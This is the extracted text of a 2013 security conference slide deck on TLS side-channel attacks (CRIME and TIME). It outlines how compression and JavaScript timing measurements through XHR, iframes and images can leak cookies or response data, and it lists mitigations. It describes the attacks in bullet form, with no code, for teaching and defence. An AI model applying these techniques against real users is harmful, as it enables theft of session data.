Timing Info-leak
Made EasyPresenter: Quan Minh Tam
Đơn vị tổ chức:
Đơn vị tài trợ:
Outline
• Review SSL/TLS weaks
• BEAST is not beast
• CRIME is not crime
– Compression
– CRIME
• TIME is time
– CRIME+
10/22/2013 11:32 PM www.securitybootcamp.vn
Cryptanalysis
• Chosen plaintext | ciphertext
• Adaptive chosen plaintext | ciphertext
• Side channel attack
• Bruteforce attack
• Meet-in-the middle
• Linear | differential attack
• Birthday
10/22/2013 11:32 PM www.securitybootcamp.vn
Timeline
10/22/2013 11:32 PM www.securitybootcamp.vn
• BEAST - 2011
• CRIME - 2012
• BREACH - 2013
• LUCKY 13 - 2013
• TIME - 2013
• RC4 biases in TLS
CRIME
10/22/2013 11:32 PM www.securitybootcamp.vn
CRIME
• Compression Ratio Info-leak Made Easy
• Chosen plaintext attack
10/22/2013 11:32 PM www.securitybootcamp.vn
CRIME
10/22/2013 11:32 PM www.securitybootcamp.vn
COMPRESSION
10/22/2013 11:32 PM www.securitybootcamp.vn
COMPRESSION
10/22/2013 11:32 PM www.securitybootcamp.vn
COMPRESSION
10/22/2013 11:32 PM www.securitybootcamp.vn
COMPRESSION
10/22/2013 11:32 PM www.securitybootcamp.vn
http://www.c-sharpcorner.com/uploadfile/shivprasadk/best-practice-no-4-improve-bandwidth-performance-of-asp-net-sites-using-iis-compression/
COMPRESSION
10/22/2013 11:32 PM www.securitybootcamp.vn
• Gzip/Deflate
• HTTP Respone body
• HTTP Request body
• Header compression
– SSL/TLS Compression
• Servers: Open SSL, others
• Clients: Chrome
– SPDY
• Server: Apache mod_spdy
• Client: -IE
CRIME demo
10/22/2013 11:32 PM www.securitybootcamp.vn
How can you become a victim of CRIME?
• 1st requirement: the
attacker can sniff your
network traffic.
– You share a (W)LAN.
– He's hacked your home
router.
– He's your network
admin, ISP or
government.
10/22/2013 11:32 PM www.securitybootcamp.vn
https://docs.google.com/presentation/d/11eBmGiHbYcHR9gL5nDyZChu_-lCa2GizeuOfaLU2HOU/edit#slide=id.g1d134dff_0_165
How can you become a victim of CRIME?
• 2nd requirement:
you visit evil.com.
– You click on a link.
– Or you surf a non-
HTTPS site.
10/22/2013 11:32 PM www.securitybootcamp.vn
https://docs.google.com/presentation/d/11eBmGiHbYcHR9gL5nDyZChu_-lCa2GizeuOfaLU2HOU/edit#slide=id.g1e3070b2_1_21
TIME
10/22/2013 11:32 PM www.securitybootcamp.vn
Review
• Round-Trip Time (RTT)
• Maximum Transmission Unit (MTU)
• Maximum Segment Size (MSS)
MSS = MTU - sizeof(TCPHDR) - sizeof(IPHDR)
• TCP Sliding Window System
10/22/2013 11:32 PM www.securitybootcamp.vn
10/22/2013 11:32 PM www.securitybootcamp.vn
http://ulam2.cs.luc.edu/ebook/html/slidingwindows.html
TIME
• Timing Info-leak Made Easy
• Chosen Plaintext Attack
• Targets compression and timing
information leakage
10/22/2013 11:32 PM www.securitybootcamp.vn
• HTTP request
– CRIME for request to extract cookie data
• HTTP response
– Extended CRIME to extract response data
– Access a behind authentication resource
for user login status detection
– Application specific: e.g. number of digits in
bank account balance
10/22/2013 11:32 PM www.securitybootcamp.vn
HTTP payload
• HTTP Payload size may carry sensitive
information
– HTTP payload size differences detection is
sufficient to extract the sensitive information
• Using timing measurements attacker can
distinguish HTTP payload size differences
• These timing measurements can be done with
javascript on attacker site
10/22/2013 11:32 PM www.securitybootcamp.vn
XHR POC
• Create HTTP request with XHR– XHR adheres to SOP
• Allows GET requests to flow
– If headers allow show response
– If not, abort
• We don’t care for the response
– Timing leaks the request size
• Use getTime() on XHR events– onreadystatechange
• Noise elimination– Repeat the process (say 10 times) and obtain Minimal time
10/23/2013 2:41 AM www.securitybootcamp.vn
• HTML with Javascript, sending method is XHR
• Sends one byte diff requests alternately 10 times
– The longer request crosses the send window boundary
– The shorter is exactly within
• Measures requests time
• Outputs length and time
• Outputs the minimal timing values for both requests’
length
10/23/2013 2:51 AM www.securitybootcamp.vn
XHR
10/22/2013 11:32 PM www.securitybootcamp.vn
10/23/2013 2:33 AM www.securitybootcamp.vn
10/23/2013 2:35 AM www.securitybootcamp.vn
10/22/2013 11:32 PM www.securitybootcamp.vn
10/23/2013 2:50 AM www.securitybootcamp.vn
Real world
10/23/2013 2:53 AM www.securitybootcamp.vn
1
SCB
• Iframe
• Use getTime() on iframe events
– onLoad
– Onreadystatechange(IE)
10/23/2013 3:02 AM www.securitybootcamp.vn
1
Real world
10/23/2013 2:57 AM www.securitybootcamp.vn
2
SCB
• HTTP request with IMG src
– It is not a image? Don’t worry
– X-Frame-Options? Don’t worry
• Use getTime() on img events
– onLoad
– Onreadystatechange(IE)
10/23/2013 3:07 AM www.securitybootcamp.vn
2
New Risk?
10/23/2013 3:09 AM www.securitybootcamp.vn
New Risk?
10/23/2013 3:12 AM www.securitybootcamp.vn
• Automation attack
– via URL
– via loadtine
• SOP?
– data leaked out
MITIGATIONS
• Adding random timing delays
• X-Frame-Options
• Unknown-parameter
• CAPTCHA, CSRF token
10/22/2013 11:32 PM www.securitybootcamp.vn
MITIGATIONS
• Adding random timing delays
10/23/2013 3:15 AM www.securitybootcamp.vn
ineffective
MITIGATIONS
• X-Frame-Options
– Browser should support and respect “X-
Frame-Options'' header for all content
inclusion (not just IFRAME);
10/23/2013 3:23 AM www.securitybootcamp.vn
MITIGATIONS
• CSRF protection
• Unknow parameter
• Captcha
10/23/2013 3:23 AM www.securitybootcamp.vn
That’s all
10/23/2013 3:24 AM www.securitybootcamp.vn
Top Related